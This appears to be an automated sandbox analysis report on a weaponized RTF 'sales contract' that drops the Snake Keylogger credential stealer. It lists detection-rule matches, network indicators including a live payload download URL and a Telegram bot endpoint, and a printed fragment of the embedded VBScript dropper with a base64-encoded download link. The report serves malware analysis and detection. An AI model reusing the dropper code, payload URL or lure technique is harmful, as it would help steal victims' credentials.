          Source: mum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: mum.exe, 0000000F.00000002.1279955679.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1280655319.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1279805294.00000000004FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: mum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgP
          Source: powershell.exe, 00000004.00000002.919533921.0000000003745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f0705964.xsph.ru
          Source: powershell.exe, 00000004.00000002.919533921.0000000003745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f0705964.xsph.ru/mum.exe
          Source: mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.995998092.0000000002941000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.993872041.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1050938955.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1052652810.000000000295C000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: powershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: mum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5C8D69A0-CC71-4B83-AF64-7D30251F3853}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: f0705964.xsph.ru
          Source: global trafficHTTP traffic detected: GET /mum.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: f0705964.xsph.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /mum.exe HTTP/1.1Host: f0705964.xsph.ruConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

          System Summary

          barindex
          Source: Revised sales contract for Crosswear.rtf, type: SAMPLEMatched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
          Source: Revised sales contract for Crosswear.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.mum.exe.26dfd64.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 8.2.mum.exe.275ac68.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
          Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Screenshot number: 8Screenshot OCR: Enable Editing when opening. 0 Page: I of 2 Words: 19 ,5) N@m 13 ;a 10096 G) FI G) ,, . i
          Source: Screenshot number: 16Screenshot OCR: Enable Editing when opening. ii: ^ Double-click to Activate Contents Package S O I @ 100
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scTJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exeJump to dropped file
          Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.drStream path '_1722767287/\x1Ole10Native' : 3N....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT..... ...C:\8jkepaD\DRdtfhgYgeghDp.scT.:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="bXVtLmV4ZQ==" 'clsyc2..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv.......
          Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.drStream path '_1722767365/\x1Ole10Native' : #O....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT.....6...C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp.scT.M....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="bXVtLmV4ZQ==" 'clsyc2..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = "..
          Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.drStream path '_1722767287/\x1Ole10Native' : Found JS content: 3N....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT..... ...C:\8jkepaD\DRdtfhgYgeghDp.scT.:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="b
          Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.drStream path '_1722767365/\x1Ole10Native' : Found JS content: #O....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT.....6...C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp.scT.M....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yu
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mum.exeJump to dropped file
          Source: DRdtfhgYgeghDp.scTStatic RTF information: Object: 0 Offset: 00000959h DRdtfhgYgeghDp.scT
          Source: Revised sales contract for Crosswear.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
          Source: Revised sales contract for Crosswear.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.mum.exe.26dfd64.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.2.mum.exe.275ac68.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000004.00000002.914867466.00000000001FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000004.00000002.915030344.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
          Source: 00000012.00000002.962416931.000000000026E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000009.00000002.937588508.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: 00000012.00000002.964450317.0000000001B86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
